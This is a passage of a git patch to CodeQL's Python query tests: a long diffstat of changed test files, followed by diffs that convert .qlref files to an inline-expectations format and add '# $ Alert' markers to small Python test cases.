+- .../undefined/UninitializedLocal.qlref | 3 +- .../Variables/undefined/enum_convert.py | 2 +- .../Variables/undefined/package/__init__.py | 2 +- .../InlineCallGraphTest.qlref | 2 +- .../InlineCallGraphTest.qlref | 2 +- .../InlineCallGraphTest.qlref | 2 +- .../library-tests/FindSubclass/Find.qlref | 2 +- .../Naming/NamingConventionsClasses.py | 2 +- .../Naming/NamingConventionsClasses.qlref | 3 +- .../general/NamingConventionsFunctions.py | 2 +- .../general/NamingConventionsFunctions.qlref | 3 +- .../Security/CWE-022-TarSlip/TarSlip.expected | 60 +++--- .../Security/CWE-022-TarSlip/TarSlip.qlref | 3 +- .../Security/CWE-022-TarSlip/TarSlipImprov.py | 110 +++++------ .../Security/CWE-022-TarSlip/ZipSlip.expected | 12 +- .../Security/CWE-022-TarSlip/ZipSlip.qlref | 3 +- .../Security/CWE-022-TarSlip/zipslip_bad.py | 20 +- .../RemoteCommandExecution.qlref | 2 +- .../Security/CWE-079/EmailXss.expected | 30 +-- .../Security/CWE-079/EmailXss.qlref | 3 +- .../Security/CWE-079/django_mail.py | 6 +- .../Security/CWE-079/flask_mail.py | 8 +- .../Security/CWE-079/sendgrid_mail.py | 8 +- ...rid_via_mail_send_post_request_body_bad.py | 8 +- .../Security/CWE-079/smtplib_bad_subparts.py | 4 +- .../CWE-079/smtplib_bad_via_attach.py | 4 +- .../XsltInjection.expected | 14 +- .../CWE-091-XsltInjection/XsltInjection.qlref | 3 +- .../Security/CWE-091-XsltInjection/xslt.py | 4 +- .../CWE-091-XsltInjection/xsltInjection.py | 12 +- .../Security/CWE-094/Js2Py.expected | 4 +- .../query-tests/Security/CWE-094/Js2Py.qlref | 3 +- .../query-tests/Security/CWE-094/Js2PyTest.py | 4 +- .../Security/CWE-1236/CsvInjection.expected | 8 +- .../Security/CWE-1236/CsvInjection.qlref | 3 +- .../query-tests/Security/CWE-1236/csv_bad.py | 8 +- .../CWE-176/UnicodeBypassValidation.qlref | 2 +- .../PossibleTimingAttackAgainstHash.expected | 6 +- .../PossibleTimingAttackAgainstHash.qlref | 3 +- .../TimingAttackAgainstHash.expected | 2 +- .../TimingAttackAgainstHash.py | 8 +- .../TimingAttackAgainstHash.qlref | 3 +- .../TimingAttackAgainstHeader.py | 2 +- .../TimingAttackAgainstHeaderValue.expected | 4 +- .../TimingAttackAgainstHeaderValue.qlref | 3 +- ...eTimingAttackAgainstSensitiveInfo.expected | 6 +- ...ibleTimingAttackAgainstSensitiveInfo.qlref | 3 +- .../TimingAttackAgainstSensitiveInfo.py | 4 +- .../ConstantSecretKey.expected | 20 +- .../ConstantSecretKey.qlref | 3 +- .../CWE-287-ConstantSecretKey/app_safe.py | 2 +- .../CWE-287-ConstantSecretKey/app_unsafe.py | 10 +- .../CWE-287-ConstantSecretKey/config.py | 8 +- .../CWE-287-ConstantSecretKey/config2.py | 2 +- .../Security/CWE-287/ImproperLdapAuth.qlref | 3 +- .../Security/CWE-287/auth_bad_2.py | 12 +- .../Security/CWE-287/auth_bad_3.py | 8 +- ...sageOfClientSideEncryptionVersion.expected | 12 +- ...feUsageOfClientSideEncryptionVersion.qlref | 3 +- .../test.py | 16 +- .../CWE-338/InsecureRandomness.expected | 4 +- .../Security/CWE-338/InsecureRandomness.py | 2 +- .../Security/CWE-338/InsecureRandomness.qlref | 3 +- .../query-tests/Security/CWE-346/Cors.py | 4 +- .../Security/CWE-346/CorsBypass.expected | 4 +- .../Security/CWE-346/CorsBypass.qlref | 3 +- .../CWE-347/JWTEmptyKeyOrAlgorithm.qlref | 3 +- ...MissingSecretOrPublicKeyVerification.qlref | 3 +- .../query-tests/Security/CWE-347/authlib.py | 4 +- .../query-tests/Security/CWE-347/pyjwt.py | 10 +- .../Security/CWE-347/python_jose.py | 6 +- .../Security/CWE-347/python_jwt.py | 2 +- ...ientSuppliedIpUsedInSecurityCheck.expected | 8 +- .../ClientSuppliedIpUsedInSecurityCheck.qlref | 3 +- .../query-tests/Security/CWE-348/flask_bad.py | 8 +- .../Security/CWE-348/tornado_bad.py | 4 +- .../LdapInsecureAuth.expected | 2 +- .../LdapInsecureAuth.qlref | 3 +- .../CWE-522/LdapInsecureAuth.expected | 14 +- .../Security/CWE-522/LdapInsecureAuth.qlref | 3 +- .../Security/CWE-522/ldap2_remote.py | 4 +- .../Security/CWE-522/ldap3_remote.py | 16 +- .../SimpleXmlRpcServer.qlref | 3 +- .../xmlrpc_server.py | 2 +- .../Security/CWE-770/UnicodeDoS.expected | 14 +- .../Security/CWE-770/UnicodeDoS.qlref | 3 +- .../query-tests/Security/CWE-770/tests.py | 14 +- .../overlay/basic-overlay-eval/test.qlref | 2 +- .../coverage-py2/argumentRoutingTest.qlref | 2 +- .../coverage-py3/argumentRoutingTest.qlref | 2 +- .../typetracking_imports/tracked.qlref | 2 +- .../frameworks/django-orm/ReflectedXss.qlref | 2 +- .../frameworks/gradio/taint_step_test.qlref | 2 +- .../modelling/FrameworkModeEndpoints.qlref | 2 +- ...gNameForArgumentInClassInstantiation.qlref | 3 +- ...gNumberArgumentsInClassInstantiation.qlref | 3 +- .../Classes/Arguments/wrong_arguments.py | 38 ++-- .../ConflictingAttributesInBaseClasses.qlref | 3 +- .../query-tests/Classes/conflicting/test.py | 2 +- .../descriptors/MutatingDescriptor.qlref | 3 +- .../query-tests/Classes/descriptors/test.py | 4 +- .../DefineEqualsWhenAddingAttributes.qlref | 3 +- .../Classes/equals-attr/attr_eq_test.py | 2 +- .../InitCallsSubclassMethod.qlref | 3 +- .../init_calls_subclass.py | 4 +- .../OverwritingAttributeInSuperClass.qlref | 3 +- .../overwriting_attribute.py | 4 +- .../ShouldBeContextManager.qlref | 3 +- .../should_be_context_manager.py | 4 +- .../MaybeUndefinedClassAttribute.qlref | 3 +- .../UndefinedClassAttribute.qlref | 3 +- .../undefined_attribute.py | 16 +- .../Classes/useless/UselessClass.qlref | 3 +- .../test/query-tests/Classes/useless/test.py | 4 +- .../Diagnostics/ExtractedFiles.qlref | 2 +- .../Diagnostics/ExtractionWarnings.qlref | 2 +- .../general/CatchingBaseException.qlref | 2 +- .../Exceptions/general/EmptyExcept.qlref | 2 +- .../general/IllegalExceptionHandlerType.qlref | 2 +- .../Exceptions/general/IllegalRaise.qlref | 2 +- .../NotImplementedIsNotAnException.qlref | 2 +- .../WrongNameForArgumentInCall.qlref | 3 +- .../WrongNumberArgumentsInCall.qlref | 3 +- .../Expressions/Arguments/use_mox.py | 8 +- .../Expressions/Arguments/wrong_arguments.py | 50 ++--- .../MixedExplicitImplicitIn3101Format.qlref | 3 +- .../UnusedArgumentIn3101Format.qlref | 3 +- .../UnusedNamedArgumentIn3101Format.qlref | 3 +- .../WrongNameInArgumentsFor3101Format.qlref | 3 +- .../WrongNumberArgumentsFor3101Format.qlref | 3 +- .../Expressions/Formatting/test.py | 32 ++-- .../Formatting/unknown_format_string.py | 6 +- .../Expressions/Regex/BackspaceEscape.qlref | 3 +- .../Regex/DuplicateCharacterInSet.qlref | 3 +- .../Regex/MissingPartSpecialGroup.qlref | 3 +- .../Expressions/Regex/UnmatchableCaret.qlref | 3 +- .../Expressions/Regex/UnmatchableDollar.qlref | 3 +- .../query-tests/Expressions/Regex/test.py | 32 ++-- .../callable/NonCallableCalled.qlref | 3 +- .../query-tests/Expressions/callable/test.py | 12 +- .../comparisons/UselessComparisonTest.qlref | 3 +- .../Expressions/comparisons/test.py | 20 +- .../eq/IncorrectComparisonUsingIs.qlref | 3 +- .../eq/NonPortableComparisonUsingIs.qlref | 3 +- .../Expressions/eq/expressions_test.py | 4 +- .../general/CompareConstants.qlref | 3 +- .../general/CompareIdenticalValues.qlref | 3 +- .../CompareIdenticalValuesMissingSelf.qlref | 3 +- .../general/ContainsNonContainer.qlref | 3 +- .../DuplicateKeyInDictionaryLiteral.qlref | 3 +- .../Expressions/general/EqualsNone.qlref | 3 +- .../ExpectedMappingForFormatString.qlref | 3 +- .../general/ExplicitCallToDel.qlref | 3 +- .../Expressions/general/HashedButNoHash.qlref | 3 +- .../general/UnnecessaryLambda.qlref | 3 +- .../general/UnsupportedFormatCharacter.qlref | 3 +- .../WrongNumberArgumentsForFormat.qlref | 3 +- .../Expressions/general/compare.py | 10 +- .../Expressions/general/expressions_test.py | 28 +-- .../Expressions/general/str_fmt_test.py | 8 +- ...tentionalImplicitStringConcatenation.qlref | 3 +- .../query-tests/Expressions/strings/test.py | 8 +- .../super/CallToSuperWrongClass.qlref | 3 +- .../query-tests/Expressions/super/test.py | 2 +- .../ModificationOfParameterWithDefault.qlref | 2 +- .../general/DeprecatedSliceMethod.qlref | 3 +- .../general/ExplicitReturnInInit.qlref | 3 +- .../Functions/general/InitIsGenerator.qlref | 3 +- .../general/IterReturnsNonIterator.qlref | 2 +- .../general/OverlyComplexDelMethod.qlref | 3 +- .../general/SignatureOverriddenMethod.qlref | 3 +- .../general/SignatureSpecialMethods.qlref | 3 +- .../general/explicit_return_in_init.py | 6 +- .../Functions/general/functions_test.py | 6 +- .../query-tests/Functions/general/om_test.py | 16 +- .../Functions/general/protocols.py | 2 +- .../iterators/IterReturnsNonSelf.qlref | 3 +- .../query-tests/Functions/iterators/test.py | 4 +- .../IncorrectlyOverriddenMethod.qlref | 2 +- ...IncorrectlySpecifiedOverriddenMethod.qlref | 2 +- .../WrongNameForArgumentInCall.qlref | 2 +- .../WrongNumberArgumentsInCall.qlref | 2 +- .../return_values/ConsistentReturns.qlref | 3 +- .../ReturnConsistentTupleSizes.qlref | 3 +- .../return_values/ReturnValueIgnored.qlref | 3 +- .../UseImplicitNoneReturnValue.qlref | 3 +- .../Functions/return_values/functions_test.py | 20 +- .../PyCheckerTests/ImportandImportFrom.qlref | 3 +- .../PyCheckerTests/ModuleImportsItself.qlref | 3 +- .../Imports/PyCheckerTests/imports_test.py | 4 +- .../PyCheckerTests/pkg_notok/__init__.py | 8 +- .../ModuleLevelCyclicImport.qlref | 3 +- .../cyclic-module-annotations-fp/module3.py | 2 +- .../cyclic-module-annotations-fp/module4.py | 2 +- .../false-negative/CyclicImport.qlref | 3 +- .../ModuleLevelCyclicImport.qlref | 3 +- .../true-negative/CyclicImport.qlref | 3 +- .../ModuleLevelCyclicImport.qlref | 3 +- .../Imports/cyclic-module/CyclicImport.qlref | 3 +- .../ModuleLevelCyclicImport.qlref | 3 +- .../Imports/cyclic-module/module1.py | 12 +- .../Imports/cyclic-module/module2.py | 2 +- .../Imports/cyclic-module/module3.py | 2 +- .../Imports/cyclic-module/module4.py | 2 +- .../Imports/cyclic-module/module5.py | 2 +- .../Imports/cyclic-module/module6.py | 2 +- .../Imports/cyclic-module/module7.py | 2 +- .../Imports/cyclic-module/module8.py | 2 +- .../Imports/cyclic-module/module9.py | 2 +- .../Imports/deprecated/DeprecatedModule.qlref | 3 +- .../query-tests/Imports/deprecated/test.py | 6 +- .../FromImportOfMutableAttribute.qlref | 3 +- .../general/ImportShadowedByLoopVar.qlref | 3 +- .../Imports/general/ImportStarUsed.qlref | 3 +- .../query-tests/Imports/general/Imports.qlref | 3 +- .../Imports/general/MultipleImport.qlref | 3 +- .../Imports/general/UnintentionalImport.qlref | 3 +- .../Imports/general/imports_mutable.py | 2 +- .../Imports/general/imports_test.py | 14 +- .../Imports/unused/UnusedImport.qlref | 3 +- .../Imports/unused/import_structure_1.py | 2 +- .../Imports/unused/import_structure_2.py | 2 +- .../Imports/unused/imports_test.py | 12 +- .../Lexical/ToDoComment/ToDoComment.qlref | 3 +- .../query-tests/Lexical/ToDoComment/todo.py | 2 +- .../commented_out_code/CommentedOutCode.qlref | 3 +- .../FCommentedOutCode.qlref | 2 +- .../Lexical/commented_out_code/test.py | 6 +- .../Metrics/cyclo/CyclomaticComplexity.qlref | 2 +- .../FunctionStatementNestingDepth.qlref | 2 +- .../Metrics/imports/DirectImports.qlref | 2 +- .../Metrics/imports/TransitiveImports.qlref | 2 +- .../Metrics/lines/CommentRatio.qlref | 2 +- .../Metrics/lines/FLinesOfCode.qlref | 2 +- .../Metrics/ratios/CommentRatio.qlref | 2 +- .../Metrics/ratios/DocStringRatio.qlref | 2 +- .../Metrics/tests/FNumberOfTests.qlref | 2 +- .../CookieInjection.expected | 8 +- .../CookieInjection.qlref | 3 +- .../CWE-020-CookieInjection/django_tests.py | 10 +- .../ExternalAPIsUsedWithUntrustedData.qlref | 2 +- .../UntrustedDataToExternalAPI.expected | 14 +- .../UntrustedDataToExternalAPI.qlref | 3 +- .../Security/CWE-020-ExternalAPIs/test.py | 14 +- .../IncompleteHostnameRegExp.qlref | 3 +- .../hosttest.py | 2 +- .../IncompleteUrlSubstringSanitization.qlref | 3 +- .../urltest.py | 4 +- .../OverlyLargeRangeQuery.qlref | 3 +- .../CWE-020-SuspiciousRegexpRange/test.py | 22 +-- .../Security/CWE-022-TarSlip/TarSlip.expected | 20 +- .../Security/CWE-022-TarSlip/TarSlip.qlref | 3 +- .../Security/CWE-022-TarSlip/tarslip.py | 36 ++-- .../CWE-074-TemplateInjection/JinjaSsti.py | 8 +- .../TemplateInjection.expected | 6 +- .../TemplateInjection.qlref | 3 +- .../CommandInjection.expected | 20 +- .../CommandInjection.qlref | 3 +- .../command_injection.py | 20 +- .../CommandInjection.qlref | 2 +- .../UnsafeShellCommandConstruction.qlref | 2 +- .../Jinja2WithoutEscaping.qlref | 3 +- .../jinja2_escaping.py | 12 +- .../ReflectedXss.expected | 8 +- .../CWE-079-ReflectedXss/ReflectedXss.qlref | 3 +- .../CWE-079-ReflectedXss/reflected_xss.py | 8 +- .../SqlInjection.expected | 34 ++-- .../CWE-089-SqlInjection/SqlInjection.qlref | 3 +- .../CWE-089-SqlInjection/sql_injection.py | 10 +- .../sqlalchemy_textclause.py | 28 +-- .../LdapInjection.expected | 22 +-- .../CWE-090-LdapInjection/LdapInjection.qlref | 3 +- .../CWE-090-LdapInjection/ldap3_bad.py | 6 +- .../CWE-090-LdapInjection/ldap_bad.py | 8 +- .../HeaderInjection.expected | 2 +- .../HeaderInjection.qlref | 3 +- .../CWE-116-BadTagFilter/BadTagFilter.qlref | 3 +- .../Security/CWE-116-BadTagFilter/tst.py | 34 ++-- .../LogInjection.expected | 10 +- .../CWE-117-LogInjection/LogInjection.qlref | 3 +- .../CWE-117-LogInjection/LogInjectionBad.py | 10 +- .../StackTraceExposure.qlref | 2 +- .../CWE-215-FlaskDebug/FlaskDebug.qlref | 3 +- .../Security/CWE-215-FlaskDebug/test.py | 12 +- .../PamAuthorization.expected | 4 +- .../PamAuthorization.qlref | 3 +- .../CWE-285-PamAuthorization/pam_test.py | 4 +- .../MissingHostKeyValidation.qlref | 3 +- .../paramiko_host_key.py | 10 +- .../RequestWithoutValidation.qlref | 3 +- .../make_request.py | 12 +- .../CleartextLogging.expected | 50 ++--- .../CleartextLogging.qlref | 3 +- .../Security/CWE-312-CleartextLogging/test.py | 62 +++--- .../CleartextStorage.expected | 8 +- .../CleartextStorage.qlref | 3 +- .../CWE-312-CleartextStorage-py3/test.py | 8 +- .../CleartextStorage.expected | 10 +- .../CleartextStorage.qlref | 3 +- .../password_in_cookie.py | 8 +- .../Security/CWE-312-CleartextStorage/test.py | 6 +- .../CWE-326-WeakCryptoKey/WeakCryptoKey.qlref | 3 +- .../CWE-326-WeakCryptoKey/weak_crypto.py | 18 +- .../BrokenCryptoAlgorithm.qlref | 3 +- .../test_cryptodome.py | 4 +- .../test_cryptography.py | 4 +- .../InsecureDefaultProtocol.qlref | 3 +- .../InsecureProtocol.py | 2 +- .../InsecureProtocol.py | 24 +-- .../InsecureProtocol.qlref | 3 +- .../import_all_one_file.py | 4 +- .../CWE-327-InsecureProtocol/import_use.py | 4 +- .../pyOpenSSL_fluent.py | 4 +- .../CWE-327-InsecureProtocol/ssl_fluent.py | 20 +- .../WeakSensitiveDataHashing.expected | 26 +-- .../WeakSensitiveDataHashing.qlref | 3 +- .../test_cryptodome.py | 14 +- .../test_cryptography.py | 14 +- .../InsecureTemporaryFile.py | 6 +- .../InsecureTemporaryFile.qlref | 3 +- .../UnsafeDeserialization.expected | 12 +- .../UnsafeDeserialization.qlref | 3 +- .../unsafe_deserialization.py | 12 +- .../CWE-601-UrlRedirect/UrlRedirect.expected | 26 +-- .../CWE-601-UrlRedirect/UrlRedirect.qlref | 4 +- .../Security/CWE-601-UrlRedirect/test.py | 26 +-- .../Security/CWE-611-Xxe/Xxe.expected | 6 +- .../Security/CWE-611-Xxe/Xxe.qlref | 3 +- .../query-tests/Security/CWE-611-Xxe/test.py | 6 +- .../XpathInjection.expected | 14 +- .../XpathInjection.qlref | 3 +- .../CWE-643-XPathInjection/xpathBad.py | 4 +- .../CWE-643-XPathInjection/xpathFlow.py | 12 +- .../PolynomialReDoS.expected | 12 +- .../PolynomialReDoS.qlref | 3 +- .../Security/CWE-730-PolynomialReDoS/test.py | 12 +- .../Security/CWE-730-ReDoS/KnownCVEs.py | 6 +- .../Security/CWE-730-ReDoS/ReDoS.qlref | 3 +- .../Security/CWE-730-ReDoS/redos.py | 180 +++++++++--------- .../Security/CWE-730-ReDoS/unittests.py | 10 +- .../RegexInjection.expected | 8 +- .../RegexInjection.qlref | 3 +- .../Security/CWE-730-RegexInjection/re_bad.py | 8 +- .../WeakFilePermissions.qlref | 3 +- .../CWE-732-WeakFilePermissions/test.py | 12 +- .../Security/CWE-776-XmlBomb/XmlBomb.expected | 2 +- .../Security/CWE-776-XmlBomb/XmlBomb.qlref | 3 +- .../HardcodedCredentials.expected | 6 +- .../HardcodedCredentials.qlref | 3 +- .../CWE-798-HardcodedCredentials/test.py | 8 +- .../CorsMisconfigurationMiddleware.qlref | 3 +- .../fastapi.py | 2 +- .../starlette.py | 2 +- .../NoSqlInjection.qlref | 2 +- .../Statements/DocStrings/DocStrings.qlref | 2 +- .../ReturnOrYieldOutsideFunction.qlref | 3 +- .../ReturnOrYieldOutsideFunction_test.py | 18 +- .../asserts/AssertLiteralConstant.qlref | 3 +- .../Statements/asserts/AssertOnTuple.qlref | 3 +- .../asserts/SideEffectInAssert.qlref | 3 +- .../query-tests/Statements/asserts/assert.py | 28 +-- .../Statements/asserts/side_effect.py | 2 +- .../Statements/exit/UseOfExit.qlref | 3 +- .../test/query-tests/Statements/exit/test.py | 2 +- .../general/BreakOrReturnInFinally.qlref | 3 +- .../general/C_StyleParentheses.qlref | 3 +- .../general/ConstantInConditional.qlref | 3 +- .../MismatchInMultipleAssignment.qlref | 3 +- .../general/ModificationOfLocals.qlref | 3 +- .../general/NestedLoopsSameVariable.qlref | 3 +- .../NestedLoopsSameVariableWithReuse.qlref | 3 +- .../general/NonIteratorInForLoop.qlref | 3 +- .../general/RedundantAssignment.qlref | 3 +- .../general/ShouldUseWithStatement.qlref | 3 +- .../general/StringConcatenationInLoop.qlref | 3 +- .../general/UnnecessaryDelete.qlref | 3 +- .../general/UnnecessaryElseClause.qlref | 3 +- .../Statements/general/UnnecessaryPass.qlref | 3 +- .../query-tests/Statements/general/nested.py | 12 +- .../Statements/general/performance.py | 4 +- .../Statements/general/statements_test.py | 22 +-- .../query-tests/Statements/general/test.py | 30 +-- .../no_effect/StatementNoEffect.qlref | 3 +- .../no_effect/UnusedExceptionObject.qlref | 3 +- .../Statements/no_effect/assert_raises.py | 4 +- .../query-tests/Statements/no_effect/test.py | 12 +- .../unreachable/UnreachableCode.qlref | 3 +- .../Statements/unreachable/test.py | 12 +- .../UnreachableCode.qlref | 3 +- .../query-tests/Testing/ImpreciseAssert.qlref | 3 +- python/ql/test/query-tests/Testing/test.py | 8 +- .../Variables/general/Global.qlref | 3 +- .../general/GlobalAtModuleLevel.qlref | 3 +- .../Variables/general/ShadowBuiltin.qlref | 3 +- .../Variables/general/ShadowGlobal.qlref | 3 +- .../Variables/general/variables_test.py | 8 +- .../Variables/multiple/MultiplyDefined.qlref | 3 +- .../Variables/multiple/uselesscode_test.py | 12 +- .../Variables/undefined/UndefinedExport.qlref | 3 +- .../Variables/undefined/UndefinedGlobal.py | 8 +- .../Variables/undefined/UndefinedGlobal.qlref | 3 +- .../Variables/undefined/UninitializedLocal.py | 30 +-- .../undefined/UninitializedLocal.qlref | 3 +- .../Variables/undefined/decorated_exports.py | 6 +- .../Variables/undefined/exports.py | 2 +- .../Variables/undefined/odasa3987.py | 2 +- ...uspiciousUnusedLoopIterationVariable.qlref | 3 +- .../unused/UnusedLocalVariable.qlref | 3 +- .../unused/UnusedModuleVariable.qlref | 3 +- .../Variables/unused/UnusedParameter.qlref | 3 +- .../test/query-tests/Variables/unused/test.py | 10 +- .../Variables/unused/variables_test.py | 18 +- .../UnusedLocalVariable.qlref | 3 +- .../unused_local_nonlocal/variables_test.py | 2 +- .../analysis/Consistency/Consistency.qlref | 2 +- .../analysis/jump_to_defn/Definitions.qlref | 2 +- .../analysis/pointsto/FailedInference.qlref | 2 +- .../pointsto/KeyPointsToFailure.qlref | 3 +- .../analysis/pointsto/Pruned.qlref | 2 +- .../suppression/AlertSuppression.qlref | 2 +- 498 files changed, 1715 insertions(+), 1496 deletions(-) diff --git a/python/ql/test/2/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref b/python/ql/test/2/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref index f43176f3d7a8..e2e9a180ab1c 100644 --- a/python/ql/test/2/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref +++ b/python/ql/test/2/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref @@ -1 +1,2 @@ -Classes/InconsistentMRO.ql \ No newline at end of file +query: Classes/InconsistentMRO.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Classes/inconsistent-mro/inconsistent_mro.py b/python/ql/test/2/query-tests/Classes/inconsistent-mro/inconsistent_mro.py index 346778648349..a8e76c6bfb11 100644 --- a/python/ql/test/2/query-tests/Classes/inconsistent-mro/inconsistent_mro.py +++ b/python/ql/test/2/query-tests/Classes/inconsistent-mro/inconsistent_mro.py @@ -6,7 +6,7 @@ class X(object): class Y(X): pass -class Z(X, Y): +class Z(X, Y): # $ Alert pass class O: diff --git a/python/ql/test/2/query-tests/Classes/new-style/PropertyInOldStyleClass.qlref b/python/ql/test/2/query-tests/Classes/new-style/PropertyInOldStyleClass.qlref index 297295c006e6..fa1947665113 100644 --- a/python/ql/test/2/query-tests/Classes/new-style/PropertyInOldStyleClass.qlref +++ b/python/ql/test/2/query-tests/Classes/new-style/PropertyInOldStyleClass.qlref @@ -1 +1,2 @@ -Classes/PropertyInOldStyleClass.ql +query: Classes/PropertyInOldStyleClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Classes/new-style/SlotsInOldStyleClass.qlref b/python/ql/test/2/query-tests/Classes/new-style/SlotsInOldStyleClass.qlref index 62fb3202a16f..688f31402ad0 100644 --- a/python/ql/test/2/query-tests/Classes/new-style/SlotsInOldStyleClass.qlref +++ b/python/ql/test/2/query-tests/Classes/new-style/SlotsInOldStyleClass.qlref @@ -1 +1,2 @@ -Classes/SlotsInOldStyleClass.ql \ No newline at end of file +query: Classes/SlotsInOldStyleClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Classes/new-style/SuperInOldStyleClass.qlref b/python/ql/test/2/query-tests/Classes/new-style/SuperInOldStyleClass.qlref index 08f737893eff..293fc72d86ca 100644 --- a/python/ql/test/2/query-tests/Classes/new-style/SuperInOldStyleClass.qlref +++ b/python/ql/test/2/query-tests/Classes/new-style/SuperInOldStyleClass.qlref @@ -1 +1,2 @@ -Classes/SuperInOldStyleClass.ql \ No newline at end of file +query: Classes/SuperInOldStyleClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Classes/new-style/newstyle_test.py b/python/ql/test/2/query-tests/Classes/new-style/newstyle_test.py index f1e3ea8e42c8..44dce333ef90 100644 --- a/python/ql/test/2/query-tests/Classes/new-style/newstyle_test.py +++ b/python/ql/test/2/query-tests/Classes/new-style/newstyle_test.py @@ -1,7 +1,7 @@ #Only works for Python2 -class OldStyle1: +class OldStyle1: # $ Alert[py/slots-in-old-style-class] __slots__ = [ 'a', 'b' ] @@ -12,7 +12,7 @@ def __init__(self, a, b): class OldStyle2: def __init__(self, x): - super().__init__(x) + super().__init__(x) # $ Alert[py/super-in-old-style] class NewStyle1(object): diff --git a/python/ql/test/2/query-tests/Classes/new-style/property_old_style.py b/python/ql/test/2/query-tests/Classes/new-style/property_old_style.py index 8291feab26c1..0b529d9edb7e 100644 --- a/python/ql/test/2/query-tests/Classes/new-style/property_old_style.py +++ b/python/ql/test/2/query-tests/Classes/new-style/property_old_style.py @@ -5,6 +5,6 @@ class OldStyle: def __init__(self, x): self._x = x - @property + @property # $ Alert[py/property-in-old-style-class] def piosc(self): return self._x \ No newline at end of file diff --git a/python/ql/test/2/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref b/python/ql/test/2/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref index d4986ffc84ce..35f6da7add55 100644 --- a/python/ql/test/2/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref +++ b/python/ql/test/2/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref @@ -1 +1,2 @@ -Classes/MaybeUndefinedClassAttribute.ql +query: Classes/MaybeUndefinedClassAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref b/python/ql/test/2/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref index 7ac0a3b18b77..f0e8fb722784 100644 --- a/python/ql/test/2/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref +++ b/python/ql/test/2/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref @@ -1 +1,2 @@ -Classes/UndefinedClassAttribute.ql +query: Classes/UndefinedClassAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/general/CatchingBaseException.qlref b/python/ql/test/2/query-tests/Exceptions/general/CatchingBaseException.qlref index 5588dbf2c7b4..33b4697e7ef7 100644 --- a/python/ql/test/2/query-tests/Exceptions/general/CatchingBaseException.qlref +++ b/python/ql/test/2/query-tests/Exceptions/general/CatchingBaseException.qlref @@ -1 +1,2 @@ -Exceptions/CatchingBaseException.ql \ No newline at end of file +query: Exceptions/CatchingBaseException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/general/EmptyExcept.qlref b/python/ql/test/2/query-tests/Exceptions/general/EmptyExcept.qlref index 3f4987046b12..7a046d008cd2 100644 --- a/python/ql/test/2/query-tests/Exceptions/general/EmptyExcept.qlref +++ b/python/ql/test/2/query-tests/Exceptions/general/EmptyExcept.qlref @@ -1 +1,2 @@ -Exceptions/EmptyExcept.ql \ No newline at end of file +query: Exceptions/EmptyExcept.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref b/python/ql/test/2/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref index 6d49710a7599..7a7911ca4403 100644 --- a/python/ql/test/2/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref +++ b/python/ql/test/2/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref @@ -1 +1,2 @@ -Exceptions/IllegalExceptionHandlerType.ql \ No newline at end of file +query: Exceptions/IllegalExceptionHandlerType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/general/IllegalRaise.qlref b/python/ql/test/2/query-tests/Exceptions/general/IllegalRaise.qlref index 5a515d5656d3..2bee772260a9 100644 --- a/python/ql/test/2/query-tests/Exceptions/general/IllegalRaise.qlref +++ b/python/ql/test/2/query-tests/Exceptions/general/IllegalRaise.qlref @@ -1 +1,2 @@ -Exceptions/IllegalRaise.ql \ No newline at end of file +query: Exceptions/IllegalRaise.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/general/IncorrectExceptOrder.qlref b/python/ql/test/2/query-tests/Exceptions/general/IncorrectExceptOrder.qlref index bc4c3a070813..f4278558baae 100644 --- a/python/ql/test/2/query-tests/Exceptions/general/IncorrectExceptOrder.qlref +++ b/python/ql/test/2/query-tests/Exceptions/general/IncorrectExceptOrder.qlref @@ -1 +1,2 @@ -Exceptions/IncorrectExceptOrder.ql +query: Exceptions/IncorrectExceptOrder.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/general/exceptions_test.py b/python/ql/test/2/query-tests/Exceptions/general/exceptions_test.py index 6e82bc028906..023b490eaaea 100644 --- a/python/ql/test/2/query-tests/Exceptions/general/exceptions_test.py +++ b/python/ql/test/2/query-tests/Exceptions/general/exceptions_test.py @@ -14,4 +14,4 @@ def raise_tuple(cond): raise (Exception, "bananas", 17) else: #This is an error - raise (17, "bananas", Exception) + raise (17, "bananas", Exception) # $ Alert[py/illegal-raise] diff --git a/python/ql/test/2/query-tests/Exceptions/generators/UnguardedNextInGenerator.qlref b/python/ql/test/2/query-tests/Exceptions/generators/UnguardedNextInGenerator.qlref index 7fe5d609705b..f174a4a96f57 100644 --- a/python/ql/test/2/query-tests/Exceptions/generators/UnguardedNextInGenerator.qlref +++ b/python/ql/test/2/query-tests/Exceptions/generators/UnguardedNextInGenerator.qlref @@ -1 +1,2 @@ -Exceptions/UnguardedNextInGenerator.ql \ No newline at end of file +query: Exceptions/UnguardedNextInGenerator.ql +postprocess: 